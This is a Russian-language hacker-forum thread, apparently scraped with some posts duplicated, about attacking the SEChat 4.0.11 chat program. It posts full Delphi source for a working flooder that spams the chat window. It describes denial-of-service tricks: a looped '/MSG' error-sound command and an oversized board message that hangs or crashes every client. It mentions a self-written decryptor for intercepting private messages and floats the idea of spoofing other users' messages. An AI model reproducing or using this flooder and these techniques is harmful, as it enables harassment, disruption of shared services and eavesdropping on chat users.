Кто-нить знает какие есть баги на SEChat 4.0.11 ???
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Уязвимость SEChat 4.0.11
- Автор темы DezMond
- Дата начала
Уязвимости есть...Они везде есть. Просто SeChat уже несколько лет не поддерживается разработчиками (они переключились на Vypress), посему и не ищут в нем ничего...
А это я бы даже флудером не назвал. Хотя нет, можно, с натяжкой...Это просто прога, которая за тебя в чат мессаги отправляет определенное количество раз через определенный промежуток времени. Написана на дельфи с применением WinAPI. Только вот размер экзешника мне не нраится...Компилировал из исходных текстов - получалось на 20 кб меньше. Лучше собрать самому
А это я бы даже флудером не назвал. Хотя нет, можно, с натяжкой...Это просто прога, которая за тебя в чат мессаги отправляет определенное количество раз через определенный промежуток времени. Написана на дельфи с применением WinAPI. Только вот размер экзешника мне не нраится...Компилировал из исходных текстов - получалось на 20 кб меньше. Лучше собрать самому
ну во-1, что было то и вылажил, во-2 я не дурак чтобы вири класть, в-3 флдуер жёсткий.. я кидал 3 ляма соообщения... у меня комп вис
братуха, я ж тебя ни в чем не обвиняю
Мне просто интересно, почему флудер, собранный из одного и того же сорца на разных машинах весит по-разному. Может, компиляторы разные? Собирал Delphi7. Согласись, если собирать троя, то 20 кб - существенная разница.
Флудер действительно рабочий...кстати, а с русскими никами и текстами он работать будет? Я не проверял пока что, но что-то сомнения есть...
русский там не фурычит...токо инглишь
я собирал при помощи Borland Developer Studio 2006 ..
Делфи он и в африке делфи
я собирал при помощи Borland Developer Studio 2006 ..
Делфи он и в африке делфи
- Автор темы
- Добавить закладку
- #7
Spawn™ можешь скинуть сорцы на рапиду, а то тот свак недоступен :bad:
Добавлено в [time]1151573266[/time]
Кстати, ещё можна в sechat'е пофлудить прогой CommView v.4.1
Добавлено в [time]1151573266[/time]
Кстати, ещё можна в sechat'е пофлудить прогой CommView v.4.1
Да можно и сюда, флудер небольшой
Код:
program Projectflood;
{$APPTYPE CONSOLE}
uses SysUtils, Windows, Messages, Controls;
var ButtonWnd:array[1..10] of integer;
i, k, raz, w8:integer;
msg:string;
KeeperWnd:HWND;
begin
if (FindWindow(0, 'SEChat 4.0.11Beta')<>0 ) then
begin
writeln('Sechat naiden....');
KeeperWnd:=FindWindow(0, 'SEChat 4.0.11Beta');
ButtonWnd[1]:=GetWindow(KeeperWnd, gw_Child);
for i:=2 to 7 do
begin
ButtonWnd[i]:= GetWindow(ButtonWnd[i-1],gw_HWNDNext);
end;
writeln('Vvedite Soobschnie'); readln(msg);
writeln('skolko raz ?'); readln(raz);
writeln('c kakoy zaderzhkoi otpravlyaT ? ( 0 - bez zaderzhki) v millesekundax');
readln(w8);
for k:= 1 to raz do begin
SendMessage(buttonWnd[2], WM_SETTEXT ,0, LParam(PCHAR(msg)));
SendMessage(buttonWnd[1], WM_KEYDOWN, VK_RETURN , 0 );
if (w8 > 0) then
sleep(w8)
end;
end
else writeln('sechat ne nayden');
sleep(2000);
end.- Автор темы
- Добавить закладку
- #9
Нашёл прикольный баг в чате! если написать /MSG " он выдаст звук ошибки не только тебе , а у всем !!! И если написать скрипт и в цикле вставлять эту команду, то сразу будет виден эффект !!!
И ещё нашёл один баг - переполнение буфера чата !
И ещё нашёл один баг - переполнение буфера чата !
Так используй предыдущий флудер
А насчет переполнения поподробнее, как достиг, к чему приводит?
А насчет переполнения поподробнее, как достиг, к чему приводит?
- Автор темы
- Добавить закладку
- #11
Если на доске повесить охрененно большое сообщение (лучше чтоб было без пробелов). То чат будет виснуть при входе в него и при просмотра доски, причём это происходит у всех. Иногда может сам вылететь :holloween:
Добавлено в [time]1151875456[/time]
Если на доске повесить охрененно большое сообщение (лучше чтоб было без пробелов). То чат будет виснуть при входе в него и при просмотра доски, причём это происходит у всех. Иногда может сам вылететь !
Добавлено в [time]1151875456[/time]
Если на доске повесить охрененно большое сообщение (лучше чтоб было без пробелов). То чат будет виснуть при входе в него и при просмотра доски, причём это происходит у всех. Иногда может сам вылететь !
В сети можно найти SeChat 0.1 для Linux с исходниками под библиотеку Qt. Самое ценное там - алгоритм шифрования/дешифрования сообщений. Я сам элементарно написал дешифратор, который хватает все лички и вообще все пакеты, рассылаемые чатом.
Только формат протокола видно сильно изменился с тех времен. Опции идут не текстом, а просто какими-то значащими байтами. Лениво пока разбитаться, где там что. При наличии желания и прямых рук думаю несложно будет написать и анонимный флудер с левым ником, перехватывать либо подделывать чужие сообщения и т. д.
Только формат протокола видно сильно изменился с тех времен. Опции идут не текстом, а просто какими-то значащими байтами. Лениво пока разбитаться, где там что. При наличии желания и прямых рук думаю несложно будет написать и анонимный флудер с левым ником, перехватывать либо подделывать чужие сообщения и т. д.
есть уже такое
Где бы только взять утилиту, позволяющую создавать пакеты для отправки в чат...